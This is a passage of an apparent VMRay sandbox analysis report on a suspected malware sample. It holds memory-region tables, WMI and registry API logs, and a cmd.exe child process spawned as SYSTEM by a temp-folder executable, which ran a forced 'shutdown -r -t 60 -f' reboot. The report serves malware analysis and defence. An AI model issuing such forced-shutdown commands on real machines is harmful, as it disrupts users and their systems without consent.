private_0x0000000000dc0000 0x00dc0000 0x00dfffff Private Memory Readable, Writable True False False -
private_0x0000000000e00000 0x00e00000 0x00e03fff Private Memory Readable, Writable True False False -
private_0x0000000000e10000 0x00e10000 0x00e1ffff Private Memory Readable, Writable True False False -
msxml3r.dll 0x00e20000 0x00e20fff Memory Mapped File Readable False False False -
private_0x0000000000e30000 0x00e30000 0x00f2ffff Private Memory Readable, Writable True False False -
locale.nls 0x00f30000 0x00fedfff Memory Mapped File Readable False False False -
private_0x0000000000ff0000 0x00ff0000 0x0102ffff Private Memory Readable, Writable True False False -
private_0x0000000001030000 0x01030000 0x0106ffff Private Memory Readable, Writable True False False -
ole32.dll 0x01070000 0x01158fff Memory Mapped File Readable False False False -
private_0x0000000001070000 0x01070000 0x010cffff Private Memory Readable, Writable True False False -
private_0x00000000010d0000 0x010d0000 0x0115ffff Private Memory Readable, Writable True False False -
wmic.exe 0x011a0000 0x01203fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000001210000 0x01210000 0x0520ffff Pagefile Backed Memory - True False False -
sortdefault.nls 0x05210000 0x05546fff Memory Mapped File Readable False False False -
private_0x0000000005550000 0x05550000 0x0566ffff Private Memory Readable, Writable True False False -
private_0x0000000005550000 0x05550000 0x055dffff Private Memory Readable, Writable True False False -
private_0x0000000005660000 0x05660000 0x0566ffff Private Memory Readable, Writable True False False -
private_0x0000000005670000 0x05670000 0x057bffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x05670000 0x0574efff Memory Mapped File Readable False False False -
private_0x00000000057b0000 0x057b0000 0x057bffff Private Memory Readable, Writable True False False -
private_0x00000000057c0000 0x057c0000 0x05bbffff Private Memory Readable, Writable True False False -
wow64.dll 0x59300000 0x5934efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x59350000 0x59357fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x59360000 0x593d2fff Memory Mapped File Readable, Writable, Executable False False False -
msxml3.dll 0x73ba0000 0x73d2ffff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x73d30000 0x73d95fff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x73da0000 0x73dacfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x73db0000 0x73deefff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x744a0000 0x744a7fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x744b0000 0x744dffff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x74b10000 0x74b2afff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74ce0000 0x74d38fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74d40000 0x74d49fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74d50000 0x74d6dfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76970000 0x76ae5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x76f60000 0x76f6bfff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x77090000 0x77249fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x77250000 0x77292fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x77670000 0x7775ffff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x77760000 0x777e1fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x77930000 0x7798bfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x77a10000 0x77acdfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77ad0000 0x77ad6fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77af0000 0x77b9bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x77ba0000 0x77c31fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77c40000 0x77db8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007e85d000 0x7e85d000 0x7e85ffff Private Memory Readable, Writable True False False -
pagefile_0x000000007e860000 0x7e860000 0x7e95ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007e960000 0x7e960000 0x7e982fff Pagefile Backed Memory Readable True False False -
private_0x000000007e985000 0x7e985000 0x7e985fff Private Memory Readable, Writable True False False -
private_0x000000007e988000 0x7e988000 0x7e98afff Private Memory Readable, Writable True False False -
private_0x000000007e98b000 0x7e98b000 0x7e98dfff Private Memory Readable, Writable True False False -
private_0x000000007e98e000 0x7e98e000 0x7e98efff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfc03e6ffff Private Memory Readable True False False -
pagefile_0x00007dfc03e70000 0x7dfc03e70000 0x7ffc03e6ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc04032000 0x7ffc04032000 0x7ffffffeffff Private Memory Readable True False False -
Threads
Thread 0xd58
12 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\wbem\wmic.exe, base_address = 0x11a0000 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 True 1
Fn
COM Create interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER False 1
Fn
Process #12: cmd.exe
0 0
»
Information Value
ID #12
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:30, Reason: Child Process
Unmonitor End Time: 00:02:31, Reason: Terminated by Timeout
Monitor Duration 00:00:01
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xd08
Parent PID 0xef8 (c:\users\ciihmn~1\appdata\local\temp\busmeat.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x CE4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
cmd.exe 0x00840000 0x0088ffff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000a60000 0x00a60000 0x04a5ffff Pagefile Backed Memory - True False False -
private_0x0000000004a60000 0x04a60000 0x04a7ffff Private Memory Readable, Writable True False False -
private_0x0000000004a80000 0x04a80000 0x04a81fff Private Memory Readable, Writable True False False -
pagefile_0x0000000004a90000 0x04a90000 0x04aa3fff Pagefile Backed Memory Readable True False False -
private_0x0000000004ab0000 0x04ab0000 0x04aeffff Private Memory Readable, Writable True False False -
private_0x0000000004af0000 0x04af0000 0x04beffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004bf0000 0x04bf0000 0x04bf3fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004c00000 0x04c00000 0x04c00fff Pagefile Backed Memory Readable True False False -
private_0x0000000004c10000 0x04c10000 0x04c11fff Private Memory Readable, Writable True False False -
private_0x0000000004c80000 0x04c80000 0x04c8ffff Private Memory Readable, Writable True False False -
private_0x0000000004d80000 0x04d80000 0x04e7ffff Private Memory Readable, Writable True False False -
wow64.dll 0x59300000 0x5934efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x59350000 0x59357fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x59360000 0x593d2fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77c40000 0x77db8fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f140000 0x7f140000 0x7f162fff Pagefile Backed Memory Readable True False False -
private_0x000000007f16b000 0x7f16b000 0x7f16bfff Private Memory Readable, Writable True False False -
private_0x000000007f16c000 0x7f16c000 0x7f16efff Private Memory Readable, Writable True False False -
private_0x000000007f16f000 0x7f16f000 0x7f16ffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfc03e6ffff Private Memory Readable True False False -
pagefile_0x00007dfc03e70000 0x7dfc03e70000 0x7ffc03e6ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc04032000 0x7ffc04032000 0x7ffffffeffff Private Memory Readable True False False -
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image